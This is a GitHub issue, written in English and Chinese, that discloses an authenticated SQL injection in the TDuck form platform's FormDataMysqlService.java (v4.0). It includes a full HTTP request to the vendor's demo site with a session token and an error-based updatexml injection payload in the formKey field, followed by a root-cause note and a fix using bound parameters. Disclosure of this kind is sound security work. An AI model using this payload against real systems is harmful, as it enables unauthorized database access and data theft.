Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[vulnerability] Back-office management statistics function sql injection in FormDataMysqlService.java (FormDataMysqlService.java 存在后管SQL注入漏洞) #22

Open
shellfeel opened this issue Dec 19, 2023 · 0 comments
Open

[vulnerability] Back-office management statistics function sql injection in FormDataMysqlService.java (FormDataMysqlService.java 存在后管SQL注入漏洞) #22

shellfeel opened this issue Dec 19, 2023 · 0 comments

Comments

@shellfeel
Copy link

1.Steps to reproduce (复现步骤)

1.Use the demo environment on the official website for authentication (https://demo.tduckapp.com/project) and register a user using the registration function (1b7pl_dp@linshiyouxiang.net/123456) (使用官网的demo环境进行验证(https://demo.tduckapp.com/project),使用注册功能注册一个用户(1b7pl_dp@linshiyouxiang.net/123456))

image

2. Login and construct the following request, header in the Token replaced by the registered user login token, the parameter formKey value for malicious injection statement(登录并构造如下请求,header 中Token更换为注册的用户登录的token,参数formKey值为恶意注入语句)

POST /user/form/data/query?timestamp=1702986363697&sign=d40296262a3e99f608de2a9d7e435658 HTTP/1.1
Host: demo.tduckapp.com
Cookie: Hm_lvt_4dbdbc5421c41984499f878628d60f2f=1702985656; Hm_lpvt_4dbdbc5421c41984499f878628d60f2f=1702985890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIyMTMyMSIsImlhdCI6MTcwMjk4NTg0NCwiZXhwIjoxNzAzNTkwNjQ0fQ.illpxfzf2O1AeJ3Ra3AHLgRufKgL9_KK1MAwfu0_l9C7GxSJT_ta9cDipGVWEhMijrS79N3lAksz7DgUzlhwUg
Content-Length: 122
Origin: https://demo.tduckapp.com
Referer: https://demo.tduckapp.com/project/form/data?key=MVWB25aE&active=data&type=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"authGroupId":null,"formKey":"MVWB25aE' or updatexml(1,concat(0x7e,user(),0x7e),1)='1","filter":{},"size":10,"current":0}

3. Generate sql error page and successfully display user(), the vulnerability is successfully verified.(产生sql报错页面并成功回显user(),漏洞验证成功)

image

2. Vulnerability Existence Source Code Analysis(漏洞存在源码分析)

FormDataMysqlService.java 中对应的search 方法,对request传入的formKey参数未做任何限制,直接拼接sql进行执行
image

3. affected version (受影响版本)

This sqli affects the latest version of the curren(v4.0)

4.fixes Recommendations (修复建议)

Using precompiled binding parameters(使用预编译绑定参数)
@shellfeel shellfeel changed the title [vulnerability] Backend statistics function sql injection in FormDataMysqlService.java (FormDataMysqlService.java 存在后官SQL注入漏洞) [vulnerability] Back-office management statistics function sql injection in FormDataMysqlService.java (FormDataMysqlService.java 存在后管SQL注入漏洞) Dec 19, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@shellfeel